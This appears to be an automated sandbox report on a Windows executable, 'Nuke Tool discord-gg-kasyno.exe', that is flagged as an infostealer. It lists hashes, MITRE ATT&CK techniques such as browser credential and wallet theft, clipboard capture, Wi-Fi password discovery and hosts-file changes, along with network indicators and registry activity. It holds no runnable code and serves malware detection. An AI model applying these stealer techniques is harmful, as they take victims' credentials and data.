eacbb5f16c8e1315bfa69d3bb0ce318cf246cff642bbde43e6263fd34e0c399b

Resubmissions

12-12-2024 15:34

241212-szwtpaykhv 10

12-12-2024 15:12

12-12-2024 03:03

11-12-2024 08:54

08-12-2024 15:39

Analysis

max time kernel
1243s
max time network
1236s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
12-12-2024 03:03

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Nuke Tool discord-gg-kasyno.exe
Size

42.5MB
MD5

51817b9dcd9c193c3358f6b179d268d1
SHA1

48711e49dd33723c12a2ba925d228b99ab297274
SHA256

eacbb5f16c8e1315bfa69d3bb0ce318cf246cff642bbde43e6263fd34e0c399b
SHA512

6a5b1ac87137fe7ced1c902ee331d2eaf38a6d042b836190abd1a6a9f3826e1141c86ab64557992e7c388278f81f8abd04e60027e790cad8713c374f920f6957
SSDEEP

786432:gDEDi+G9pN2TxKFLyPnoVIXkXVGRG7dcuZaqdior4XXpf6q3loaU/fsc+KkeAhev:ggDi+RoFLyPno/AydcucZfb3KnqKUhev

Score

8^/10

collection credential_access defense_evasion discovery execution persistence phishing privilege_escalation pyinstaller spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1468	powershell.exe
2500	powershell.exe
2644	powershell.exe
1364	powershell.exe
2292	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Nuke Tool discord-gg-kasyno.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

A potential corporate email address has been identified in the URL: water.css@2
phishing

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
3696	cmd.exe
3608	powershell.exe

Executes dropped EXE 3 IoCs

pid	Process
1944	bound.exe
900	bound.exe
1660	rar.exe

Loads dropped DLL 30 IoCs

pid	Process
3788	Nuke Tool discord-gg-kasyno.exe
3788	Nuke Tool discord-gg-kasyno.exe
3788	Nuke Tool discord-gg-kasyno.exe
3788	Nuke Tool discord-gg-kasyno.exe
3788	Nuke Tool discord-gg-kasyno.exe
3788	Nuke Tool discord-gg-kasyno.exe
3788	Nuke Tool discord-gg-kasyno.exe
3788	Nuke Tool discord-gg-kasyno.exe
3788	Nuke Tool discord-gg-kasyno.exe
3788	Nuke Tool discord-gg-kasyno.exe
3788	Nuke Tool discord-gg-kasyno.exe
3788	Nuke Tool discord-gg-kasyno.exe
3788	Nuke Tool discord-gg-kasyno.exe
3788	Nuke Tool discord-gg-kasyno.exe
3788	Nuke Tool discord-gg-kasyno.exe
3788	Nuke Tool discord-gg-kasyno.exe
3788	Nuke Tool discord-gg-kasyno.exe
900	bound.exe
900	bound.exe
900	bound.exe
900	bound.exe
900	bound.exe
900	bound.exe
900	bound.exe
900	bound.exe
900	bound.exe
900	bound.exe
900	bound.exe
900	bound.exe
900	bound.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 1 IoCs

Web Service

T1102

flow	ioc
41	raw.githubusercontent.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
1	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 4 IoCs

discovery

Process Discovery

T1057

pid	Process
536	tasklist.exe
2400	tasklist.exe
1172	tasklist.exe
4764	tasklist.exe

UPX packed file 60 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x001900000002aafe-22.dat	upx
behavioral1/memory/3788-26-0x00007FFD0D110000-0x00007FFD0D576000-memory.dmp	upx
behavioral1/files/0x001900000002aae6-29.dat	upx
behavioral1/memory/3788-31-0x00007FFD16FC0000-0x00007FFD16FE4000-memory.dmp	upx
behavioral1/files/0x001c00000002aafc-32.dat	upx
behavioral1/memory/3788-33-0x00007FFD17060000-0x00007FFD1706F000-memory.dmp	upx
behavioral1/files/0x001900000002ab07-42.dat	upx
behavioral1/files/0x001900000002aaf1-50.dat	upx
behavioral1/files/0x001c00000002aaf0-49.dat	upx
behavioral1/files/0x001900000002aaef-48.dat	upx
behavioral1/files/0x001900000002aaec-47.dat	upx
behavioral1/files/0x001900000002aaeb-46.dat	upx
behavioral1/files/0x001c00000002aaea-45.dat	upx
behavioral1/files/0x001900000002aae9-44.dat	upx
behavioral1/files/0x001a00000002aae5-43.dat	upx
behavioral1/files/0x001900000002ab04-41.dat	upx
behavioral1/files/0x001900000002ab03-40.dat	upx
behavioral1/files/0x001900000002aafd-37.dat	upx
behavioral1/files/0x001900000002aafb-36.dat	upx
behavioral1/memory/3788-56-0x00007FFD122A0000-0x00007FFD122CC000-memory.dmp	upx
behavioral1/memory/3788-58-0x00007FFD17010000-0x00007FFD17028000-memory.dmp	upx
behavioral1/memory/3788-60-0x00007FFD12940000-0x00007FFD1295F000-memory.dmp	upx
behavioral1/memory/3788-62-0x00007FFD0DCF0000-0x00007FFD0DE6A000-memory.dmp	upx
behavioral1/memory/3788-64-0x00007FFD12880000-0x00007FFD12899000-memory.dmp	upx
behavioral1/memory/3788-66-0x00007FFD16990000-0x00007FFD1699D000-memory.dmp	upx
behavioral1/memory/3788-68-0x00007FFD12270000-0x00007FFD1229E000-memory.dmp	upx
behavioral1/memory/3788-76-0x00007FFD16FC0000-0x00007FFD16FE4000-memory.dmp	upx
behavioral1/memory/3788-75-0x00007FFD09690000-0x00007FFD09A09000-memory.dmp	upx
behavioral1/memory/3788-81-0x00007FFD10CE0000-0x00007FFD10CED000-memory.dmp	upx
behavioral1/memory/3788-80-0x00007FFD122A0000-0x00007FFD122CC000-memory.dmp	upx
behavioral1/memory/3788-78-0x00007FFD12060000-0x00007FFD12075000-memory.dmp	upx
behavioral1/memory/3788-73-0x00007FFD0DC30000-0x00007FFD0DCE8000-memory.dmp	upx
behavioral1/memory/3788-72-0x00007FFD0D110000-0x00007FFD0D576000-memory.dmp	upx
behavioral1/memory/3788-102-0x00007FFCF5550000-0x00007FFCF5668000-memory.dmp	upx
behavioral1/memory/3788-101-0x00007FFD17010000-0x00007FFD17028000-memory.dmp	upx
behavioral1/memory/3788-143-0x00007FFD12940000-0x00007FFD1295F000-memory.dmp	upx
behavioral1/memory/3788-204-0x00007FFD0DCF0000-0x00007FFD0DE6A000-memory.dmp	upx
behavioral1/memory/3788-266-0x00007FFD12880000-0x00007FFD12899000-memory.dmp	upx
behavioral1/memory/3788-329-0x00007FFD12270000-0x00007FFD1229E000-memory.dmp	upx
behavioral1/memory/3788-340-0x00007FFD0DC30000-0x00007FFD0DCE8000-memory.dmp	upx
behavioral1/memory/3788-365-0x00007FFD09690000-0x00007FFD09A09000-memory.dmp	upx
behavioral1/memory/3788-372-0x00007FFD12940000-0x00007FFD1295F000-memory.dmp	upx
behavioral1/memory/3788-373-0x00007FFD0DCF0000-0x00007FFD0DE6A000-memory.dmp	upx
behavioral1/memory/3788-367-0x00007FFD0D110000-0x00007FFD0D576000-memory.dmp	upx
behavioral1/memory/3788-368-0x00007FFD16FC0000-0x00007FFD16FE4000-memory.dmp	upx
behavioral1/memory/3788-440-0x00007FFD09690000-0x00007FFD09A09000-memory.dmp	upx
behavioral1/memory/3788-445-0x00007FFD12940000-0x00007FFD1295F000-memory.dmp	upx
behavioral1/memory/3788-444-0x00007FFD17010000-0x00007FFD17028000-memory.dmp	upx
behavioral1/memory/3788-443-0x00007FFD122A0000-0x00007FFD122CC000-memory.dmp	upx
behavioral1/memory/3788-442-0x00007FFD17060000-0x00007FFD1706F000-memory.dmp	upx
behavioral1/memory/3788-441-0x00007FFD16FC0000-0x00007FFD16FE4000-memory.dmp	upx
behavioral1/memory/3788-439-0x00007FFCF5550000-0x00007FFCF5668000-memory.dmp	upx
behavioral1/memory/3788-437-0x00007FFD12060000-0x00007FFD12075000-memory.dmp	upx
behavioral1/memory/3788-435-0x00007FFD0DC30000-0x00007FFD0DCE8000-memory.dmp	upx
behavioral1/memory/3788-434-0x00007FFD12270000-0x00007FFD1229E000-memory.dmp	upx
behavioral1/memory/3788-433-0x00007FFD16990000-0x00007FFD1699D000-memory.dmp	upx
behavioral1/memory/3788-432-0x00007FFD12880000-0x00007FFD12899000-memory.dmp	upx
behavioral1/memory/3788-431-0x00007FFD0DCF0000-0x00007FFD0DE6A000-memory.dmp	upx
behavioral1/memory/3788-438-0x00007FFD10CE0000-0x00007FFD10CED000-memory.dmp	upx
behavioral1/memory/3788-425-0x00007FFD0D110000-0x00007FFD0D576000-memory.dmp	upx

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SystemTemp	chrome.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Detects Pyinstaller 1 IoCs

pyinstaller

resource	yara_rule
behavioral1/files/0x004800000002aae0-105.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
4816	cmd.exe
2084	netsh.exe

Checks processor information in registry 2 TTPs 12 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
4460	WMIC.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
3460	systeminfo.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133784463884627790"	chrome.exe

Modifies registry class 64 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1"	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\2	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	OpenWith.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\14\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	notepad.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\14\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\13\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	msedge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\14\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\14\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\14\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257"	notepad.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\13\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\13\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\14\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\1 = 8c0031000000000047590e67110050524f4752417e310000740009000400efbec55259618c59cd182e0000003f0000000000010000000000000000004a00000000003459e400500072006f006700720061006d002000460069006c0065007300000040007300680065006c006c00330032002e0064006c006c002c002d0032003100370038003100000018000000	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\16\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}	notepad.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\13\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	notepad.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByKey:PID = "0"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\13\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	notepad.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\14\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	notepad.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\14\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	msedge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\13\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	notepad.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 000000000200000001000000ffffffff	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\13\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	notepad.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\14\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	notepad.exe
Key created	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\13	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\3\NodeSlot = "16"	notepad.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\2 = 3a002e803accbfb42cdb4c42b0297fe99a87c641260001002600efbe110000008b11c756af18db01baa990be424cdb01baa990be424cdb0114000000	msedge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\13\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\MRUListEx = 0100000000000000ffffffff	OpenWith.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\15\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	OpenWith.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202020202020202020202	notepad.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\3\MRUListEx = ffffffff	notepad.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\14\Shell\SniffedFolderType = "Generic"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\13\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\13\Shell	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\14\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\14\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\14\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\14\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\15\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	notepad.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\Shell\SniffedFolderType = "Generic"	notepad.exe
Key created	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\13\Shell	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\1\MRUListEx = ffffffff	OpenWith.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\15\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	OpenWith.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\14\Shell\SniffedFolderType = "Generic"	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\14\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0c000000ffffffff	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\2\0\0 = 76003100000000008c59f318100050595a2d30307e312e50595a00005a0009000400efbe8c59f3188c59f3182e000000885b0200000006000000000000000000000000000000b0cad600500059005a002d00300030002e00700079007a005f0065007800740072006100630074006500640000001c000000	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	OpenWith.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202020202020202020202	OpenWith.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\15\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	notepad.exe
